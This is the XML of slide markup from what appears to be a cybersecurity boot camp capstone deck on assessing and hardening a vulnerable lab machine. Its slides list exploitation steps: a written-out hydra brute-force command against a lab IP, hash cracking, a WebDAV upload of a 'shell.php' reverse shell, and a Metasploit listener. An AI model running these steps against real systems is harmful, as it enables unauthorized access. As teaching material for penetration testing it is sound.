            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1276" b="1274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4" name="Google Shape;984;p102"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1276" b="1274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5" name="Google Shape;985;p102"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1276" b="1274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6" name="Google Shape;986;p102"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1276" b="1274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7" name="Google Shape;987;p102"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1276" b="1274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8" name="Google Shape;988;p102"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1276" b="1274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7. Fist to Five">
  <p:cSld name="CUSTOM_2_3_1_1_3_1_1_2_1_1_1_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1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0" name="Google Shape;990;p103"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="58" b="58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91" name="Google Shape;991;p103"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr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2" name="Google Shape;992;p10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93" name="Google Shape;993;p103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994" name="Google Shape;994;p10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995" name="Google Shape;995;p103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 b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="0000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996" name="Google Shape;996;p103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8. Review">
  <p:cSld name="CUSTOM_17_2_1_2_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1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8" name="Google Shape;998;p104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99" name="Google Shape;999;p10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00" name="Google Shape;1000;p10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01" name="Google Shape;1001;p104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-US" sz="36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 b="0" i="0" u="none" strike="noStrike" cap="non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002" name="Google Shape;1002;p10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. Numbered 1–2 (Blue)">
  <p:cSld name="CUSTOM_2_7_1_5_2_1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oogle Shape;37;p6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286275" y="649650"/>
            <a:ext cx="827450" cy="4115237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6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39" name="Google Shape;39;p6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0" name="Google Shape;40;p6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41" name="Google Shape;41;p6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" name="Google Shape;42;p6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" name="Google Shape;43;p60"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="2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" name="Google Shape;44;p60"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4936274" y="890150"/>
            <a:ext cx="2688300" cy="476700"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="365C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-US" sz="21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System Hardening</a:t>
            </a:r>
            <a:endParaRPr sz="2100" b="0" i="0" u="none" strike="noStrike" cap="none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5" name="Google Shape;45;p60"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="5072469" y="1278938"/>
            <a:ext cx="261029" cy="144694"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartExtract">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="365C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60"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457246" y="887925"/>
            <a:ext cx="2688300" cy="476700"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 16667"/>
            </a:avLst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-US" sz="21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Alarm</a:t>
            </a:r>
            <a:endParaRPr sz="2100" b="0" i="0" u="none" strike="noStrike" cap="none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" name="Google Shape;47;p60"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="575363" y="1276701"/>
            <a:ext cx="226486" cy="144694"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartExtra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" name="Google Shape;48;p60"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3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9. Take a Break 1">
  <p:cSld name="CUSTOM">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1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p10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005" name="Google Shape;1005;p10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42900" y="-24125"/>
            <a:ext cx="9229800" cy="5191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0. Take a Break 2">
  <p:cSld name="CUSTOM_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1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Google Shape;1007;p10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008" name="Google Shape;1008;p10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9" name="Google Shape;1009;p106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US" sz="48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 b="0" i="0" u="none" strike="noStrike" cap="non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10" name="Google Shape;1010;p106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1. Take a Break 1">
  <p:cSld name="CUSTOM_9">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="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10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013" name="Google Shape;1013;p10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42900" y="-24125"/>
            <a:ext cx="9229800" cy="5191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7. The End">
  <p:cSld name="CUSTOM_7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oogle Shape;50;p61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61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en-US"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52;p61"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/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3" name="Google Shape;53;p6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48599" y="496138"/>
            <a:ext cx="5046801" cy="415122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411"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst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. Title Slide: Web Development">
  <p:cSld name="CUSTOM_2_3_1_1_1_1_1_2_1_2_1_1_1_1_2_2_1_2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62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411"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="56" name="Google Shape;56;p6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49411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p62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2019 Trilogy Education Services, Inc. </a:t>
            </a:r>
            <a:endParaRPr sz="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62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marR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1800" b="0" i="0" u="none" strike="noStrike" cap="none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59" name="Google Shape;59;p6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411"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60" name="Google Shape;60;p62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" name="Google Shape;61;p62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" name="Google Shape;62;p62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63" name="Google Shape;63;p6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. Title Slide: UX/UI Design">
  <p:cSld name="CUSTOM_2_3_1_1_1_1_1_2_1_2_1_1_1_1_2_2_1_1_1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63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411"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66" name="Google Shape;66;p6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49411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63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marR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 b="0" i="0" u="none" strike="noStrike" cap="none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68" name="Google Shape;68;p6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411"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69" name="Google Shape;69;p63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Google Shape;70;p63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" name="Google Shape;71;p63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72" name="Google Shape;72;p6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63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2019 Trilogy Education Services, Inc. </a:t>
            </a:r>
            <a:endParaRPr sz="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. Title Slide: Cybersecurity ">
  <p:cSld name="CUSTOM_2_3_1_1_1_1_1_2_1_2_1_1_1_1_2_2_1_1_1_1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64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411"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="76" name="Google Shape;76;p6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49411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6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marR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 Boot Camp</a:t>
            </a:r>
            <a:endParaRPr sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none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78" name="Google Shape;78;p6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411"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79" name="Google Shape;79;p64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" name="Google Shape;80;p64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" name="Google Shape;81;p64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82" name="Google Shape;82;p6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64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2019 Trilogy Education Services, Inc. </a:t>
            </a:r>
            <a:endParaRPr sz="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5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</p:sldLayoutIdLst>
  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main">
    <mc:Choice Requires="p14">
      <p:transition p14:dur="400">
        <p:fade thruBlk="1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"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274350" y="170392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Capstone Engagement</a:t>
            </a:r>
            <a:endParaRPr sz="31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3100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3100">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Assessment, Analysis, </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="3100">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="3100">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>and Hardening of a Vulnerable System</a:t>
            </a:r>
            <a:endParaRPr sz="3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19" name="Google Shape;1019;p1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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exploitation: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Brute Force 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A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>ttacks </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="24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r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Brute force the password for user ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>ashton</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>’ to access the hidden directory (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>secret_folder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>) using the hydra command:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="14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400" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>hydra –l </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>ashton</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> –P /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>/share/wordlists/rockyou.txt –s 80 –f –v 192.168.1.105 http-get /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>company_folders</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>secret_folder</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="14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r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Break the hash password for user ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>ryan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>’ using the site ‘crackstation.net’:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="14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67" name="Google Shape;1167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3743" y="3590955"/>
            <a:ext cx="8251740" cy="667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63312A5-9C59-4C39-9A6D-CB4FC67708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615" y="2035628"/>
            <a:ext cx="7395851" cy="65156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C6C2713-B632-4F45-8E86-59B08041A392}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="475615" y="4917927"/>
            <a:ext cx="71642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Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Please refer to Appendix B:  Brute Force Attacks for tools and techniques used.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4965795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3" name="Google Shape;1193;p1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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exploitation: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>File/Shell Script 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U</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>ploads</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="24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r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Connect to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>WebDav</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> server using the username ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>ryan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>’ and hash password recently cracked:</a:t>
            </a:r>
            <a:endParaRPr sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1195" name="Google Shape;1195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99586" y="1436370"/>
            <a:ext cx="2720340" cy="2270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6" name="Google Shape;1196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6482" y="1049365"/>
            <a:ext cx="5706350" cy="378594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10957B2-25E8-4B8A-912A-D3E6176AABAC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="454970" y="4897279"/>
            <a:ext cx="71642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Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Please refer to Appendix C1:  File/Shell Script Uploads for tools and techniques used.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" name="Google Shape;1208;p1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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exploitation: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>File/Shell 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S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>cript 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U</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>ploads (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>con’t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="24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r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Create and upload a reverse shell payload script called ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>shell.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>’:</a:t>
            </a:r>
            <a:endParaRPr sz="14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sz="12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sz="12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sz="12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sz="12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sz="12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sz="12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sz="12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sz="12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sz="12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sz="12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sz="12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sz="12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sz="12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sz="12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sz="12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sz="12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sz="12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sz="12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sz="12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sz="12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br>
              <a:rPr lang="en-US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								</a:t>
            </a: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endParaRPr sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1209" name="Google Shape;1209;p1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endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1210" name="Google Shape;1210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1249" y="1081100"/>
            <a:ext cx="3667440" cy="346905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5258304-89B1-4C19-B0E8-DB6E4F0D8EA4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="454970" y="4897279"/>
            <a:ext cx="71642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Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Please refer to Appendix C2:  File/Shell Script Uploads for how we created this </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>shell.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> file.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6" name="Google Shape;1236;p21"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="6626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r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exploitation: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Reverse Shell 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S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>ession </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="24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r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>From the security tool Metasploit’s command line interface, we </a:t>
            </a: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create a listener where we wait to be connected to the victim’s machine.</a:t>
            </a:r>
            <a:b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en-US" sz="1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400" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Victim click’s on the ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>shell.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>’ file to open up a shell session on the attacker’s machine.</a:t>
            </a:r>
            <a:b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en-US" sz="14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endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1238" name="Google Shape;1238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4970" y="1311084"/>
            <a:ext cx="5042730" cy="440303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0B77ABC-2C6A-464C-B5F9-B56F924D1039}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="454970" y="4897279"/>
            <a:ext cx="71642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Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Please refer to Appendix D1 &amp; D2:  Reverse Shell Session for tools and techniques used.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284A8A4-CBEB-4FD9-BD70-4F0A87C212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970" y="2522145"/>
            <a:ext cx="3641927" cy="228743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8" name="Google Shape;1258;p2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r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exploitation: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Reverse Shell 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S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>ession (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>con’t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="24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r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
